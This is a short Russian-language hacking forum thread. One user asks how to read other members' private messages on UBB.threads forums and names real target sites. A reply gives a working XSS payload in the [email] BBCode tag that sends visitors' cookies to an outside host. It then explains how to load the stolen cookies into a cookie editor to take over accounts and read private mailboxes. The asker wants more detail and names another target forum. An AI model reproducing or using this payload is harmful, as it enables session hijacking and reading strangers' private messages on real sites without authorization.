Hi ALL!
Люди подскажите, как можно посмотреть приваты юзеров на форумах типа UBB.threads™ 6.2 или 6.3? http://forum.antichat.ru/iB_html/non-cgi/emoticons/confused.gif
Для примера приведу http://forum.isurgut.ru/ubbthreads.php?Cat= или http://www.autoua.net/auto_f/ubbthreads.php
заранее спасибки http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif
my rspkt 2 u.

для http://forum.isurgut.ru :
Есть уязвимость в теге [email]
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[email]"`/=`ddd@dd.dd[/email] ` style=`background:url("javascript:i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;")` [/QUOTE]<span id='postcolor'>
Получаем куки, заменяем их у себя в браузере (например програмкой CookieEditor, качать здесь http://antichat.ru/progs.shtml ), получаем доступ к приватным ящикам.

c00l! http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif
Если можно - чуть подробнее план действий пжлст. Как именно через куки доступ получить? Прогу скачал, посмотрел.
Да, и вот ещё один сайт нашёл, на нём можно по приваткам полазить http://forum.investo.ru/ubbthreads.php?Cat= ???
My best 2 U http://forum.antichat.ru/iB_html/non-cgi/emoticons/cool.gif